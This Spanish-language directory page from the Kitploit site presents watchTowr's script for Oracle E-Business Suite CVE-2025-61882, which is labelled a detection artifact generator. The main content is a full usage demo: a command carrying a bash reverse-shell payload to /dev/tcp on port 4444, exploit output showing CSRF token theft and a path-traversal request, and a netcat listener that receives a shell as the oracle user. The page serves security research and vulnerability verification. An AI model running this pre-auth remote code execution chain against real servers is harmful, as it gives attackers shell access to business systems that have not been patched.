Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882 — Genera artefactos de detección para Oracle E-Business Suite CVE-2025-61882 al servir un reverse shell payload para verificar pre-auth RCE. | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/watchtowr-vs-oracle-e-business-suite-cve-2025-61882
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-oracle-e-business-suite-cve-2025-61882

watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

Genera artefactos de detección para Oracle E-Business Suite CVE-2025-61882 al servir un reverse shell payload para verificar pre-auth RCE.

Ver Repositorio
5593hace 11 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

imagen

Generador de artefactos de detección para Oracle E-Business Suite CVE-2025-61882

Consulte nuestra publicación en el blog para obtener detalles técnicos

Detección en acción

root@kitploit:~
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

        (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator

          - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-61882]

[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -

Listener

root@kitploit:~
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$

Descripción

Este script intenta detectar si Oracle E-Business Suite es vulnerable a CVE-2025-61882

Versiones Afectadas

Oracle E-Business Suite, versiones 12.2.3-12.2.14

Para más información, visite Oracle Security Alert Advisory - CVE-2025-61882

Siga a watchTowr Labs

Para las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

Descargar herramienta